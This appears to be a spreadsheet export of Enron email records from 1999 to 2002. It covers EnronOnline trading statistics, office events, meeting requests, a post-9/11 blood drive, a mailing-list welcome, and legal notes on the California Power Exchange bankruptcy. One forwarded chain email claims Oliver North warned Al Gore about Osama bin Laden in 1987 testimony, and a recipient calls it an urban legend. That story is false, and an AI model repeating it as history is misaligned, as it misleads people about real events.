    <t>frozenset({'ami_chokshi@enron.com', 'ggreen2@txu.com', 'cstone1@txu.com', 'crodrig@ect.enron.com', 'kenenglish@txu.com', 'mjones7@txu.com', 'daren.j.farmer@enron.com', 'earl.tisdale@enron.com', 'gary_hanks@ect.enron.com'})</t>
  </si>
  <si>
    <t>ENRON ACTUALS FOR JUNE 22, 2000</t>
  </si>
  <si>
    <t xml:space="preserve">TECO TAP                  100.000/ HPL IFERC_x000D_
                                             20.000/ ENRON_x000D_
_x000D_
_x000D_
LS HPL KATY                  30.000/ ENRON_x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Oct 2000 00:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'chris.mahoney@enron.com'})</t>
  </si>
  <si>
    <t>Re: EnronOnline Executive Summary for October 23, 2000</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for the thought.  We are trying to get more fund business already _x000D_
through Per in the NY office.  Do you have any funds you'd like to sign up.  _x000D_
In terms of products, I was thinking more depth in products we feel _x000D_
comfortable managing.  Maybe different spreads/cracks, whatever.  You can _x000D_
control product launch, not the funds.  Can you give a some ideas of more/new _x000D_
products we trade or more/new products you'd like to get on eol.  What more _x000D_
products will your customers want?  _x000D_
_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Chris Mahoney_x000D_
10/24/2000 06:30 PM_x000D_
To: Jeffrey A Shankman/HOU/ECT@ECT_x000D_
cc: John L Nowlan/HOU/ECT@ECT, George McClellan/HOU/ECT@ECT, Gary _x000D_
Hickerson/HOU/ECT@ECT, Mark Tawney/HOU/ECT@ECT _x000D_
Subject: Re: EnronOnline Executive Summary for October 23, 2000  _x000D_
_x000D_
Jeff,_x000D_
One thought that will take some work with the credit department is to try and _x000D_
get more of the fund and small trading companies to do_x000D_
their day trading with us.  I would think getting the small specs on our _x000D_
system would give us much greater daily deal flow.  On the oil_x000D_
side, our main counterparties are the large speculative trading shops and _x000D_
this reflects that it is mainly proprietary traders that we_x000D_
are attracting at this stage.  Not sure how realistic this is from a credit _x000D_
perspective but if we could create some type of margin account_x000D_
for the smaller players, similiar to the futures exchange clearing houses,  _x000D_
we might be able to significantly increase our volumes with _x000D_
the existing instruments that we are presently offering.   _x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Jeffrey A Shankman                           24/10/2000 22:31_x000D_
	_x000D_
_x000D_
To: John L Nowlan/HOU/ECT@ECT, George McClellan/HOU/ECT@ECT, Gary _x000D_
Hickerson/HOU/ECT@ECT, Mark Tawney/HOU/ECT@ECT, Chris Mahoney/LON/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: EnronOnline Executive Summary for October 23, 2000_x000D_
_x000D_
FYI.  I'd like to be number 2 behind ENA.  And a close 2nd that is. This _x000D_
should be a priority for us. I'd like to set up a meeting shortly to put _x000D_
together a strategy on how we can get there.  More to follow._x000D_
---------------------- Forwarded by Jeffrey A Shankman/HOU/ECT on 10/24/2000 _x000D_
04:20 PM ---------------------------_x000D_
_x000D_
_x000D_
Leonardo Pacheco@ENRON_x000D_
10/24/2000 04:12 PM_x000D_
To: Kenneth Lay/Corp/Enron@Enron, Jeff Skilling/Corp/Enron@ENRON, Joseph W _x000D_
Sutton/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Cliff Baxter/HOU/ECT@ECT, Mike _x000D_
McConnell/HOU/ECT@ECT, Jay Fitzgerald/Corp/Enron@ENRON, Mark _x000D_
Palmer/Corp/Enron@ENRON, John Sherriff/LON/ECT@ECT, Greg Whalley/HOU/ECT@ECT, _x000D_
Jeffrey A Shankman/HOU/ECT@ECT, Kimberly Hillis/HOU/ECT@ect, Daniel _x000D_
Reck/HOU/ECT@ECT, Tim Belden/HOU/ECT@ECT, Thor Lien/OSL/ECT@ECT, Douglas S _x000D_
Friedman/HOU/ECT@ECT, Bob Crane/HOU/ECT@ECT, Joe Gold/LON/ECT@ECT, Richard _x000D_
Lewis/LON/ECT@ECT, John L Nowlan/HOU/ECT@ECT, Paul _x000D_
Quilkey/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Mark E Haedicke/HOU/ECT@ECT, _x000D_
Dave Samuels/HOU/ECT@ECT, Rahil Jafry/HOU/ECT@ECT, Louise _x000D_
Kitchen/HOU/ECT@ECT, Bob Shults/HOU/ECT@ECT, Amita Gosalia/LON/ECT@ECT, _x000D_
George McClellan/HOU/ECT@ECT, Sally Beck/HOU/ECT@ECT, Jim Fallon/Enron _x000D_
Communications@Enron Communications, Nick Mooney/LON/ECT@ECT, Jeffrey _x000D_
McMahon/HOU/ECT@ECT, Joseph P Hirl/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
William S Bradford/HOU/ECT@ECT, Mark Frevert/NA/Enron@Enron, Paula _x000D_
Rieker/Corp/Enron@ENRON, Cedric Burgher/Corp/Enron@ENRON, Mark _x000D_
Koenig/Corp/Enron@ENRON, Kathryn Corbally/Corp/Enron@ENRON, _x000D_
michael.r.brown@enron.com, Allan Sommer/Corp/Enron@Enron, Philippe A _x000D_
Bibi/HOU/ECT@ECT, Steven J Kean/NA/Enron@Enron, Bruce Garner/LON/ECT@ECT_x000D_
cc: David Forster/Corp/Enron@Enron, Sheri Thomas/HOU/ECT@ECT, Kal _x000D_
Shah/HOU/ECT@ECT, Andy Zipper/Corp/Enron@Enron, Savita _x000D_
Puthigai/NA/Enron@Enron, Liz M Taylor/HOU/ECT@ECT, Jennifer _x000D_
Thome/NA/Enron@Enron, Molly Hellerman/LON/ECT@ECT _x000D_
Subject: EnronOnline Executive Summary for October 23, 2000_x000D_
_x000D_
Following please find the Daily EnronOnline Executive Summary._x000D_
_x000D_
EnronOnline Executive Summary for 10/23/00_x000D_
Transaction Summary	_x000D_
External Transactions Today	3,083_x000D_
Average Daily External Transactions (30 day Trailing Avg)	2,831_x000D_
Total Life to Date Transactions	375,561_x000D_
_x000D_
EnronOnline Daily % of Entity's Total Transactions for 	10/23/00_x000D_
Enron North America	74%_x000D_
Enron Europe Limited	38%_x000D_
Global Products	30%_x000D_
Enron Metals	9%_x000D_
_x000D_
EnronOnline Percentage of Total Corporate Transactions _x000D_
(30 day Trailing Avg)	45%_x000D_
_x000D_
Gross Notional Value of EnronOnline Transactions	Total_x000D_
Today	2,154,640,388_x000D_
MTD	31,885,125,075_x000D_
LTD	200,577,359,347_x000D_
Average Daily Notional Value (30 Day Trailing Avg)	1,943,444,113_x000D_
	_x000D_
Notional Revenue from Physical Flows to Date	14,232,828,485_x000D_
_x000D_
Counterparties, Users, and Products Offered	_x000D_
Counterparties having transacted to date	528_x000D_
New Counterparties transacting for the first time today	2_x000D_
Number of Products Offered Today	1,259_x000D_
Total Number of External Users Logged on Today	2,811_x000D_
Average # of External Users logged on (30 day Trailing Avg)	2,575_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 2 Oct 2000 06:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Happy Hour for Jennifer Fraser &amp; Sarah Mulholland</t>
  </si>
  <si>
    <t xml:space="preserve">please put on calendar_x000D_
---------------------- Forwarded by Jeffrey A Shankman/HOU/ECT on 10/02/2000 _x000D_
01:23 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Becky Young @ ENRON                           09/29/2000 09:09 AM_x000D_
	_x000D_
_x000D_
To: Dutch Quigley/HOU/ECT@ECT, David Cox/Enron Communications@Enron _x000D_
Communications, Bob Crane/HOU/ECT@ECT, David W Delainey/HOU/ECT@ECT, John J _x000D_
Lavorato/Corp/Enron@Enron, Jeffrey A Shankman/HOU/ECT@ECT, Bryan _x000D_
Burnett/HOU/ECT@ECT, Julie A Gomez/HOU/ECT@ECT, Adam Gross/HOU/ECT@ECT, John _x000D_
L Nowlan/HOU/ECT@ECT, Kay Chapman/HOU/ECT@ECT, Erika Breen/HOU/EES@EES, Posey _x000D_
Martinez/HOU/ECT@ECT, Chris Gaskill/Corp/Enron@Enron, Colin _x000D_
Tonks/LON/ECT@ECT, Daniel Diamond/HOU/ECT@ECT, Gary W Lamphier/HOU/ECT@ECT, _x000D_
Mckenzie Senigal/HOU/ECT@ECT, Eloy Escobar/Corp/Enron@ENRON, Daniel _x000D_
Quezada/Corp/Enron@Enron, Tony Harris/HOU/ECT@ECT, Ed Quinn/HOU/ECT@ECT, Bob _x000D_
Anderson/GCO/Enron@ENRON, Jay Epstein/HOU/ECT@ECT, Erika Breen/HOU/EES@EES, _x000D_
Jeanie Slone/HOU/ECT@ECT, John Grass/Corp/Enron@ENRON, Daniel _x000D_
Falcone/Corp/Enron@ENRON, Michael Benien/Corp/Enron@ENRON, Jennifer _x000D_
Burns/HOU/ECT@ECT, Kimberly Hillis/HOU/ECT@ect, John Arnold/HOU/ECT@ECT, _x000D_
Peter F Keavey/HOU/ECT@ECT, Mike Maggi/Corp/Enron@Enron, Larry _x000D_
May/Corp/Enron@Enron, Carey M Metz/HOU/ECT@ECT, Thomas A Martin/HOU/ECT@ECT, _x000D_
Martin Cuilla/HOU/ECT@ECT, Joe Parks/Corp/Enron@ENRON, Sylvia S _x000D_
Pollan/HOU/ECT@ECT, Kevin Ruscitti/HOU/ECT@ECT, Elizabeth _x000D_
Shim/Corp/Enron@ENRON, Hunter S Shively/HOU/ECT@ECT, Kelli _x000D_
Stevens/HOU/ECT@ECT, Fletcher J Sturm/HOU/ECT@ECT, Phillip K _x000D_
Allen/HOU/ECT@ECT, Tori Kuykendall/HOU/ECT@ECT, Matthew Lenhart/HOU/ECT@ECT, _x000D_
Kimberly S Olinger/HOU/ECT@ECT, Kenneth Shulklapper/HOU/ECT@ECT, Tara _x000D_
Piazze/NA/Enron@ENRON, Kortney Brown/HOU/ECT@ECT, Airam Arteaga/HOU/ECT@ECT, _x000D_
Felecia Russell/Corp/Enron@ENRON, Laura Harder/Corp/Enron@Enron, Crystal _x000D_
Blair/HOU/ECT@ECT, Jessica Presas/Corp/Enron@ENRON, Ina Rangel/HOU/ECT@ECT, _x000D_
Fred Lagrasta/HOU/ECT@ECT, George N Gilbert/HOU/ECT@ECT, Charles H _x000D_
Otto/HOU/ECT@ECT, Nelson Ferries/Corp/Enron@ENRON, Ross Prevatt/HOU/ECT@ECT, _x000D_
Lucy Ortiz/HOU/ECT@ECT, Vikas Dwivedi/NA/Enron@Enron, Troy _x000D_
Black/Corp/Enron@ENRON, Jennifer Shipos/HOU/ECT@ECT, Craig _x000D_
Breslau/HOU/ECT@ECT, Mark Smith/Corp/Enron@Enron, Bill _x000D_
Berkeland/Corp/Enron@Enron, Sheetal Patel/HOU/ECT@ECT, Sabina _x000D_
Rank/NA/Enron@Enron, Mog Heu/NA/Enron@Enron, Amanda Huble/NA/Enron@Enron, _x000D_
Russell Dyk/Corp/Enron@ENRON, Keith Holst/HOU/ECT@ect, Mike _x000D_
Grigsby/HOU/ECT@ECT, Susan M Scott/HOU/ECT@ECT, Frank Ermis/HOU/ECT@ECT, _x000D_
Pavel Zadorozhny/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Happy Hour for Jennifer Fraser &amp; Sarah Mulholland_x000D_
_x000D_
Please join me in wishing Jen &amp; Sarah good luck in all of their new endeavors _x000D_
with Enron Global Markets.  We will be celebrating on Friday, October 13 @ _x000D_
Slainte Irish Pub, located at 509 Main Street.  We have reserved the entire _x000D_
upstairs and plan arrive around 5:00 PM.  Please forward this e-mail to _x000D_
anyone that might have been overlooked.  If you have any questions, please _x000D_
give me a call._x000D_
_x000D_
Thanks,_x000D_
Becky Young_x000D_
x30622 _x000D_
</t>
  </si>
  <si>
    <t>Wed, 10 Oct 2001 10:45:43 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'a..gomez@enron.com', 'jean.mrha@enron.com', 'mike.grigsby@enron.com', 'melissa.jones@enron.com', 'ina.rangel@enron.com', 's..shively@enron.com', 'alexandra.villarreal@enron.com'})</t>
  </si>
  <si>
    <t>RE: Meeting re: Capacity Center</t>
  </si>
  <si>
    <t xml:space="preserve">I am not available at this time._x000D_
_x000D_
 -----Original Appointment-----_x000D_
From: 	Coleman, Venita   On Behalf Of Gomez, Julie A._x000D_
Sent:	Tuesday, October  9, 2001 1:32 PM_x000D_
To:	Shively, Hunter S.; Grigsby, Mike; Neal, Scott; Mrha, Jean; Villarreal, Alexandra; Rangel, Ina; Jones, Melissa_x000D_
Subject:	Meeting re: Capacity Center_x000D_
When:	Thursday, October  11, 2001 11:00 AM-12:00 PM (GMT-06:00) Central Time (US &amp; Canada)._x000D_
Where:	EB 3567_x000D_
</t>
  </si>
  <si>
    <t>Mon, 14 Jan 2002 08:06:53 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'peter.makkai@enron.com'})</t>
  </si>
  <si>
    <t>RE: A piece of history- 1987</t>
  </si>
  <si>
    <t>Urban legend .. Osama was fighting for the US then I think.  Interesting_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Makkai, Peter  _x000D_
Sent:	Monday, January 14, 2002 10:00 AM_x000D_
To:	Schneider, Bryce; Thomas, Paul D._x000D_
Subject:	FW: A piece of history- 1987_x000D_
_x000D_
_x000D_
you believe this????_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Burnett, Lisa  _x000D_
Sent:	Monday, January 14, 2002 9:46 AM_x000D_
To:	Valdes, Maria; Choate, Jason; Bentley, Corry; Stepenovitch, Joe; Makkai, Peter_x000D_
Subject:	A piece of history- 1987_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
  Subject: Do you remember this?  Ollie made the headlines in_x000D_
  1987 and was laughed at by the News Media._x000D_
_x000D_
 IT WAS 1987!_x000D_
_x000D_
 At a lecture the other day they played an old video of Lt._x000D_
 Col. Oliver North testifying at the Iran-Contra hearings during the_x000D_
 Reagan administration._x000D_
_x000D_
 There was Ollie in front of God and country getting the third degree._x000D_
 But what he said was stunning!!_x000D_
 He was being drilled by some senator; "Did you not recently spend close_x000D_
 to $60,000 for home security system?"_x000D_
_x000D_
 Ollie replied, "Yes I did sir." The senator continued, trying to get a_x000D_
 laugh out of the audience," Isn't this just a little excessive?" "No_x000D_
 sir," continued Ollie._x000D_
_x000D_
 "No? And why not?" the senator asked._x000D_
_x000D_
 "Because the lives of my family and I were threatened sir."_x000D_
_x000D_
 "Threatened? By whom?" the senator questioned._x000D_
_x000D_
 "'By a terrorist, sir." Ollie answered._x000D_
_x000D_
 "Terrorist? What terrorist could possibly scare you that much?"_x000D_
_x000D_
 "His name is Osama bin Laden sir." Ollie replied._x000D_
_x000D_
 At this point the senator tried to repeat the name, but_x000D_
 couldn't pronounce it, which most people back then probably couldn't. A_x000D_
 couple of people laughed at the attempt. Then the senator continued._x000D_
_x000D_
 "Why are you so afraid of this man?" the senator asked._x000D_
_x000D_
 "Because sir, he is the most evil person alive that I know_x000D_
 of," Ollie answered._x000D_
_x000D_
 "And what do you recommend we do about him?" asked the senator._x000D_
 "Well sir, if it were up to me, I would recommend that an_x000D_
 assassin team be formed to eliminate him and his men from the face of_x000D_
 the earth."_x000D_
_x000D_
 The senator disagreed with this approach and that was all that_x000D_
 was shown of the clip._x000D_
_x000D_
 If anyone is interested, the Senator turned out to be none_x000D_
 other than Al Gore.</t>
  </si>
  <si>
    <t>Wed, 12 Sep 2001 11:38:16 -0700 (PDT)</t>
  </si>
  <si>
    <t>Enron Blood Drive</t>
  </si>
  <si>
    <t xml:space="preserve">In light of the tragic events in New York City and Washington, DC, there is a national call for blood donations.  Enron is taking two actions:_x000D_
_x000D_
	1.	The City of Houston is sponsoring a city-wide blood drive at the George R. Brown Convention Center today.  For your convenience, Enron is providing transportation to and from the Convention Center from 9am-3pm.  Transportation will be leaving from the Enron Building every half hour.  We have been informed that there is a 3 - 4 hour wait.  _x000D_
_x000D_
	2.	Enron's regularly scheduled blood drive is being held on Thursday, September 13, from 7 a.m. until 4 p.m.  Two mobile units from the M. D. Anderson Blood Center will be parked outside the Enron Building on Andrews Street to accommodate donors.  Call the Enron Health Center at ext. 3-6100 to schedule an appointment.  Information regarding Enron's blood drive program and eligibility criteria is location on the Wellness webpage http://hrweb.enron.com/wellness/healthService/bloodDrive.asp _x000D_
_x000D_
Our latest information is that three busloads of Enron employees have already been taken to the Convention Center and many of you have already scheduled appointments for Thursday.  We commend all of you for your community spirit.  </t>
  </si>
  <si>
    <t>Wed, 12 Jul 2000 02:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Resume of a former FX trader</t>
  </si>
  <si>
    <t>This is the most bizarre resume I've seen in a long time.</t>
  </si>
  <si>
    <t>Tue, 15 May 2001 10:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>I can be deleted also._x000D_
_x000D_
-----Original Message-----_x000D_
From: Dalia, Keith A - TOS-DITT1 [mailto:kadalia@bpa.gov]_x000D_
Sent: Tuesday, May 15, 2001 4:40 PM_x000D_
To: RRGA-L@LIST.RTOWEST.ORG_x000D_
Subject:_x000D_
_x000D_
_x000D_
You have been added to the RRGA-L mailing list (RTO West Congestion Model_x000D_
Content Group) by Keith Dalia &lt;kadalia@BPA.GOV&gt;._x000D_
_x000D_
Please save this message for future  reference, especially if this is the_x000D_
first time you subscribe to an  electronic mailing list. If you ever need_x000D_
to  leave the  list,  you  will find  the  necessary instructions  below._x000D_
Perhaps  more importantly,  saving a  copy of  this message  (and of  all_x000D_
future subscription notices  from other mailing lists) in  a special mail_x000D_
folder will give you instant access to the list of mailing lists that you_x000D_
are subscribed  to. This may  prove very useful the  next time you  go on_x000D_
vacation and  need to leave  the lists temporarily so  as not to  fill up_x000D_
your  mailbox while  you  are away!  You should  also  save the  "welcome_x000D_
messages" from the  list owners that you will  occasionally receive after_x000D_
subscribing to a new list._x000D_
_x000D_
To send  a message to  all the people  currently subscribed to  the list,_x000D_
just send mail  to RRGA-L@LIST.RTOWEST.ORG. This is  called "sending mail_x000D_
to the  list", because  you send  mail to a  single address  and LISTSERV_x000D_
makes  copies  for all  the  people  who  have subscribed.  This  address_x000D_
(RRGA-L@LIST.RTOWEST.ORG)  is also  called the  "list address".  You must_x000D_
never try to send any command to that address, as it would be distributed_x000D_
to all the people  who have subscribed. All commands must  be sent to the_x000D_
"LISTSERV  address",   LISTSERV@LIST.RTOWEST.ORG.  It   is  very_x000D_
important to understand  the difference between the  two, but fortunately_x000D_
it is  not complicated. The  LISTSERV address is  like a FAX  number that_x000D_
connects you  to a  machine, whereas  the list address  is like  a normal_x000D_
voice line connecting you to a person. If you make a mistake and dial the_x000D_
FAX number  when you  wanted to talk  to someone on  the phone,  you will_x000D_
quickly realize  that you used the  wrong number and call  again. No harm_x000D_
will have been done. If on the  other hand you accidentally make your FAX_x000D_
call  someone's  voice  line,  the  person receiving  the  call  will  be_x000D_
inconvenienced, especially if your FAX then re-dials every 5 minutes. The_x000D_
fact that  most people  will eventually  connect the  FAX machine  to the_x000D_
voice line to  allow the FAX to  go through and make the  calls stop does_x000D_
not mean  that you  should continue  to send FAXes  to the  voice number._x000D_
People would just get mad at you.  It works pretty much the same way with_x000D_
mailing  lists, with  the difference  that  you are  calling hundreds  or_x000D_
thousands of people  at the same time, and consequently  you can expect a_x000D_
lot of people to get upset if  you consistently send commands to the list_x000D_
address._x000D_
_x000D_
You may leave the list at any  time by sending a "SIGNOFF RRGA-L" command_x000D_
to LISTSERV@LIST.RTOWEST.ORG. You can also tell LISTSERV how you_x000D_
want it to confirm  the receipt of messages you send to  the list. If you_x000D_
do not trust  the system, send a "SET RRGA-L  REPRO" command and LISTSERV_x000D_
will send you a  copy of your own messages, so that you  can see that the_x000D_
message was distributed and did not get damaged on the way. After a while_x000D_
you  may find  that this  is getting  annoying, especially  if your  mail_x000D_
program does not  tell you that the  message is from you  when it informs_x000D_
you that new mail has arrived from  RRGA-L. If you send a "SET RRGA-L ACK_x000D_
NOREPRO" command, LISTSERV will mail you a short acknowledgement instead,_x000D_
which  will look  different in  your  mailbox directory.  With most  mail_x000D_
programs you  will know immediately  that this is an  acknowledgement you_x000D_
can read  later. Finally,  you can  turn off  acknowledgements completely_x000D_
with "SET RRGA-L NOACK NOREPRO"._x000D_
_x000D_
Following  instructions from  the list  owner, your  subscription options_x000D_
have been set to "NOFILES REPRO" rather than the usual LISTSERV defaults._x000D_
For more  information about subscription  options, send a  "QUERY RRGA-L"_x000D_
command to LISTSERV@LIST.RTOWEST.ORG._x000D_
_x000D_
Contributions sent to this list are automatically archived. You can get a_x000D_
list of the available archive files  by sending an "INDEX RRGA-L" command_x000D_
to  LISTSERV@LIST.RTOWEST.ORG. You  can then  order these  files_x000D_
with a "GET RRGA-L LOGxxxx"  command, or using LISTSERV's database search_x000D_
facilities. Send an  "INFO DATABASE" command for more  information on the_x000D_
latter._x000D_
_x000D_
This  list is  available  in digest  form.  If you  wish  to receive  the_x000D_
digested version of the postings, just issue a SET RRGA-L DIGEST command._x000D_
_x000D_
Please note that  it is presently possible for other  people to determine_x000D_
that  you are  signed up  to the  list through  the use  of the  "REVIEW"_x000D_
command,  which  returns   the  e-mail  address  and  name   of  all  the_x000D_
subscribers. If  you do not  want your name to  be visible, just  issue a_x000D_
"SET RRGA-L CONCEAL" command._x000D_
_x000D_
More  information on  LISTSERV  commands  can be  found  in the  LISTSERV_x000D_
reference  card, which  you can  retrieve  by sending  an "INFO  REFCARD"_x000D_
command to LISTSERV@LIST.RTOWEST.ORG.</t>
  </si>
  <si>
    <t>Thu, 12 Apr 2001 10:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jrnelson@llgm.com'})</t>
  </si>
  <si>
    <t>California Power Exchange</t>
  </si>
  <si>
    <t>Joe Eisenberg just floated a trial balloon with me.  Joe is at risk of losing _x000D_
the CFO and counsel, something I reported yesterday.  On top of that, the _x000D_
creditors committee is balking at spending a part of the approximately $20 _x000D_
million of "unencumbered" cash to keep the doors open and generate numbers _x000D_
that only benefit participants.  Joe is thinking about a liquidating plan.  _x000D_
He didn't have all the details, but he did mention several points.  Some _x000D_
amount would be set aside to pay the trade debt.  He used a $5 million _x000D_
number.  The total unsecured debt (not including participants' claims) could _x000D_
be as much as $20 million if rejection damages are included, so those _x000D_
creditors would stand to get around 25%.  The balance of the cash, after _x000D_
paying administrative costs, would go, directly or indirectly, for the _x000D_
benefit of participants.  The litigation and claims resolution would be under _x000D_
the control of the participants.  Some of the cash would pay for accounting _x000D_
work.  Other cash would pay for prosecution of litigation claims under the _x000D_
direction of a committee.  In the end, whatever cash remains together with _x000D_
any recoveries from litigation, would presumably be distributed to _x000D_
participants.  I assume the plan would designate some individual to supervise _x000D_
the wind up process.  The participants committee could remain in existence to _x000D_
supervise the process.  If we structured such a plan, we'd try to push it to _x000D_
confirmation quickly, assuming support from the creditors committee.  The _x000D_
option may be appointment of a trustee.  We should discuss our preference so _x000D_
that I can get back to Eisenberg promptly._x000D_
_x000D_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at (insert your _x000D_
telephone number).  The unauthorized use, dissemination, distribution or _x000D_
reproduction of this e-mail, including attachments, is prohibited and may be _x000D_
unlawful._x000D_
J. Robert Nelson_x000D_
725 Soth Figueroa St, Los Angeles, Ca. 90017-5436_x000D_
_x000D_
_x000D_
==============================================================================_x000D_
This e-mail, including attachments, contains information that is confidential _x000D_
and may be protected by the attorney/client or other privileges.  This _x000D_
e-mail, including attachments, constitutes non-public information intended to _x000D_
be conveyed only to the designated recipient(s).  If you are not an intended _x000D_
recipient, please delete this e-mail, including attachments, and notify me.  _x000D_
The unauthorized use, dissemination, distribution or reproduction of this _x000D_
e-mail, including attachments, is prohibited and may be unlawful._x000D_
_x000D_
==============================================================================</t>
  </si>
  <si>
    <t>Mon, 10 Jul 2000 11:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'glang@brr.com'})</t>
  </si>
  <si>
    <t>Revised Barrett Amendment Agreement</t>
  </si>
  <si>
    <t>Gene:_x000D_
Enclosed for your review is a revised draft of the Amendment Agreement (clean _x000D_
and marked).  I will fax to you the confirmations that are described under _x000D_
"Exempt Transactions".  I have faxed to Chase the confirmations that are to _x000D_
be assigned.  I look forward to hearing from you._x000D_
_x000D_
_x000D_
_x000D_
Carol St. Clair_x000D_
EB 3892_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com</t>
  </si>
  <si>
    <t>Thu, 13 Dec 2001 09:46:04 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'steve.january@enron.com', 'gary.spraggins@enron.com'})</t>
  </si>
  <si>
    <t>FW: conference call</t>
  </si>
  <si>
    <t xml:space="preserve">	Do you know what this is about?  Thanks. Lynn_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Farrow, Shana  _x000D_
Sent:	Thursday, December 13, 2001 11:30 AM_x000D_
To:	Blair, Lynn; Graves, Jerry; Tate, Team_x000D_
Subject:	conference call_x000D_
Importance:	High_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Farrow, Shana  _x000D_
Sent:	Thursday, December 13, 2001 11:29 AM_x000D_
To:	Blair, Lynn; Graves, Jerry; Tate, Team_x000D_
Subject:	_x000D_
_x000D_
_x000D_
Randy Howard has requested that I reach each of you to set up a conference call regarding the Tate Issue.  He wants to know if you would be available this afternoon around 2:00 or tomorrow morning around 9:00.  If you could e-mail me and let me know what will work best for you, I'd appreciate it.  As soon as we hear from everyone, I'll send out another e-mail to give the details._x000D_
_x000D_
Thanks,_x000D_
Shana Farrow_x000D_
620-626-2210</t>
  </si>
  <si>
    <t>Tue, 21 Dec 1999 07:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'nikhil.shah@enron.com'})</t>
  </si>
  <si>
    <t>Re: Happy Holidays</t>
  </si>
  <si>
    <t>Hey Nikhil;_x000D_
Hope all is going well and you also have a good holiday!_x000D_
Ben</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 06:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thanks.  Wow, you're quick on email.  Jeff and I will be the only attendees._x000D_
m</t>
  </si>
  <si>
    <t>Fri, 30 Jun 2000 02:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: EQT Pool</t>
  </si>
  <si>
    <t xml:space="preserve">Hey, send them again.  I don't have them._x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  John M Singer @ ENRON                           06/30/2000 09:13 AM_x000D_
	_x000D_
_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: EQT Pool_x000D_
_x000D_
Yesterday I faxed you the forms for establishing a pool on Equiitrans._x000D_
Reminder, those forms must be faxed back to Equitrans TODAY to effect a _x000D_
August 1 start date._x000D_
Thanks,_x000D_
John_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 8 Nov 2000 03:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sarah.novosel@enron.com', 'james.steffes@enron.com', 'steven.kean@enron.com', 'richard.shapiro@enron.com'})</t>
  </si>
  <si>
    <t>Draft Comments for Thursday --WPTF</t>
  </si>
  <si>
    <t xml:space="preserve">fyi_x000D_
----- Forwarded by Susan J Mara/NA/Enron on 11/08/2000 11:43 AM -----_x000D_
_x000D_
	Gary Ackerman &lt;foothill@lmi.net&gt;_x000D_
	11/06/2000 11:41 PM_x000D_
	Please respond to foothill_x000D_
		 _x000D_
		 To: Bill Ross &lt;billr@calpine.com&gt;, Bob Anderson &lt;Robert_Anderson@apses.com&gt;, _x000D_
Carolyn Baker &lt;cabaker@duke-energy.com&gt;, CHARLES A MIESSNER _x000D_
&lt;camiessn@newwestenergy.com&gt;, Corby Gardin &lt;jcgardin@newwestenergy.com&gt;, curt _x000D_
hatton &lt;curt.Hatton@gen.pge.com&gt;, Curtis Kebler _x000D_
&lt;Curtis_L_Kebler@reliantenergy.com&gt;, Denice Cazalet &lt;dcazalet@apx.com&gt;, Greg _x000D_
Blue &lt;gtbl@dynegy.com&gt;, Jack Pigott &lt;jackp@calpine.com&gt;, Ken Czarnecki _x000D_
&lt;Ken_J_Czarnecki@calpx.com&gt;, Kent Wheatland &lt;KEWH@dynegy.com&gt;, "Klemstine, _x000D_
Barbara A(F56661)" &lt;barbara_klemstine@apses.com&gt;, Randy Hickok _x000D_
&lt;rjhickok@duke-energy.com&gt;, Rob Lamkin &lt;rllamkin@seiworldwide.com&gt;, Rob _x000D_
Nichol &lt;rsnichol@newwestenergy.com&gt;, robert berry &lt;berry@apx.com&gt;, Roger _x000D_
Pelote &lt;roger.pelote@williams.com&gt;, Sue Mara &lt;smara@enron.com&gt;, Jeff Crowe _x000D_
&lt;jcrowe@apx.com&gt;, Dan Douglass &lt;douglass@arterhadden.com&gt;_x000D_
		 cc: _x000D_
		 bcc: _x000D_
		 Subject: Draft Comments for Thursday_x000D_
_x000D_
Folks,_x000D_
_x000D_
Here is my first draft.  My time trial shows it takes 6 min and 45_x000D_
seconds to deliver.  We need to cut._x000D_
_x000D_
Dan, can you send me a front end to this that I will utilize to make_x000D_
copies?  Send me the front end from last week's filing supporting EPSA's_x000D_
motion._x000D_
_x000D_
I'll take comments up to 12 noon Wednesday._x000D_
gba_x000D_
=============================_x000D_
_x000D_
_x000D_
The Western Power Trading Forum (WPTF) is a California non-profit trade_x000D_
association of almost thirty members who sell, buy and exchange power_x000D_
throughout the Western U.S.  We are pleased to provide comments on the_x000D_
following areas in response to your Order issued last week._x000D_
_x000D_
1. Price caps and their unintended consequences_x000D_
_x000D_
2. Forward scheduling, penalties, mandatory must-buy, and_x000D_
_x000D_
3. Independent Governing Boards._x000D_
_x000D_
